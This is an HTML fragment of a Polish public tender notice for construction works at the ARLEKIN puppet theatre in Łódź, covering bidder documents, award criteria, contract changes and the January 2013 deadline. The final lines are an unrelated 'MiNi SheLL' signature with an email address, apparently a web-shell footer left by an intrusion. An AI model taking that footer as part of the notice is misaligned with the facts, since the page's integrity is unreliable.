<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta zostanie sporządzona na formularzu oferty (druk - załącznik nr 1 do SIWZ).
2. Pełnomocnictwo (jeżeli ofertę składa pełnomocnik - zgodnie z ppkt. 17 pkt I i ppkt. 2 pkt II SIWZ). 
3. Kosztorys ofertowy opracowany metodą kalkulacji szczegółowej zgodnie z założeniami określonymi w pkt XII SIWZ. 
UWAGA: Kosztorysy ofertowe nie będą miały zastosowania na etapie oceny ofert. Będą na tym etapie postępowania dokumentem poglądowym służącym Zamawiającemu do zorientowania się w poziomie poszczególnych cen. 
4. Harmonogram rzeczowo-terminowo-finansowy, zawierający wszystkie koszty składające się na cenę oferty, niezbędne do zrealizowania przedmiotu zamówienia z ich podziałem na poszczególne rodzaje robót (co najmniej roboty budowlane, instalacje wod-kan, instalacja c.o. i zasilanie nagrzewnic, instalacja wentylacji, instalacja elektryczna, zewnętrzne przyłącze wodociągowe). Wykonawca, którego oferta zostanie uznana za najkorzystniejszą zobowiązany jest w terminie do 14 dni po podpisaniu umowy sporządzić szczegółowy harmonogram zawierający etapy (elementy), które mogą stanowić osobny element odbioru częściowego i uwzględnieniem terminów realizacji każdego z tych elementów. Zamawiający zastrzega sobie prawo do zmiany przez Wykonawcę przedstawionego w ofercie harmonogramu rzeczowo-terminowo-finansowego w zależności od wysokości środków finansowych oraz terminów wykonywania poszczególnych części przedmiotu zamówienia. Wykonawca przyjmie w harmonogramie rzeczowo-terminowo-finansowym wartość robót do zrealizowania w 2013 roku na poziomie do 60% całej wartości oferowanej ceny ryczałtowej.
5. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w sposób wystarczający potwierdza spełnianie opisanego przez Zamawiającego warunku.
6. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
7. Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5 - 8 ustawy pzp, mają miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5 - 8 ustawy pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym, że w przypadku gdy w miejscu zamieszkania tych osób nie wydaj się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.
8. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia dotyczące terminów wystawienia dokumentów stosuje się odpowiednio.
9. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. Pełnomocnictwo należy złożyć w formie oryginału lub kopii poświadczonej notarialnie.  W przypadku wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, każdy z warunków określonych w punktach 1.2.-1.5. SIWZ winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy wykonawcy wspólnie. Warunek udziału w postępowaniu określony w punkcie 1.1. i 1.6. SIWZ musi spełniać każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o zamówienie dokumenty wykazujące, że Wykonawca nie podlega wykluczeniu z postępowania składa każdy z Wykonawców oddzielnie.
10. Dokument załączony do oferty sporządzony w języku innym niż język polski musi być złożony wraz z tłumaczeniem na język polski.
11. Wykonawca, którego oferta zostanie wybrana zobowiązany jest najpóźniej w dniu podpisania  umowy wnieść zabezpieczenie należytego wykonania umowy w wysokości 10% ceny ofertowej brutto. Waluta zabezpieczenia PLN.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonywania następujących zmian w umowie:
1) zmian według zasad zapisanych w § 1 ust.3 (Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. Będą to, przykładowo, okoliczności: a) owodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy z jednoczesnym zachowaniem parametrów technicznych i jakościowych przedmiotu umowy; b) owodujące poprawienie parametrów technicznych; c) wnikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów. Dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń), §3 ust. 4 (Termin wykonania i odbioru ustalony w ust. 1 może ulec przesunięciu w przypadku wystąpienia opóźnień wynikających z: a)	przestojów i opóźnień zawinionych przez Zamawiającego; b) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającego bezpośredni wpływ na terminowość wykonywania robót; c) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności), § 5 ust. 3-6 (3. Istnieje możliwość dokonania zmiany kierownika budowy oraz pozostałych osób przedstawionych w ofercie przetargowej, jedynie za uprzednią pisemną zgodą Zamawiającego. 4. Wykonawca z własnej inicjatywy proponuje zmianę osób wyszczególnionych w ust. 3 niniejszego paragrafu w następujących przypadkach: a) śmierci, choroby lub innych zdarzeń losowych; b) jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy. 5. W przypadku zmiany osób wyszczególnionych w ust. 3 niniejszego paragrafu, nowe osoby powołane do pełnienia w/w obowiązków muszą spełniać wymagania określone w specyfikacji istotnych warunków zamówienia dla danej funkcji), §10 ust. 6 (W trakcie realizacji umowy Wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w art. 148 ust. 1  ustawy Prawo Zamówień Publicznych. Zmiana formy zabezpieczenia musi być dokonana z zachowaniem ciągłości zabezpieczenia i bez zmiany jego wysokości) treści umowy;
2) zmian na podstawie art. 23 pkt 1 ustawy Prawo budowlane - uzgodnionych z Zamawiającym zmian w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;
3) zmian na podstawie art. 20 ust. 1 pkt 4 lit. b) ustawy Prawo budowlane, uzgodnionych z Zamawiającym rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego;
4) zmian podczas wykonywania robót i nie odstępujących w sposób istotny 
od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a ust. 5 ustawy Prawo budowlane i dokonanych zgodnie z zapisami art. 36a ust. 6 ustawy Prawo budowlane, spełniając zapisy art. 57 ust. 2 ustawy Prawo budowlane;
5) zmniejszenia zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
6) zmniejszenia wynagrodzenia wykonawcy w związku z uzgodnionym zmniejszeniem  wykonania zakresu rzeczowego umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arlekin.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr Lalek ARLEKIN w Łodzi 
Al. 1 Maja 2
90-718 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2013 godzina 10:00, miejsce: Teatr Lalek ARLEKIN w Łodzi, al. 1 Maja 2 w sekretariacie, 90-718 Łódź.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską z Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013, Oś priorytetowa VI. Odnowa Obszarów Miejskich - Działanie VI.1 Rewitalizacja obszarów problemowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com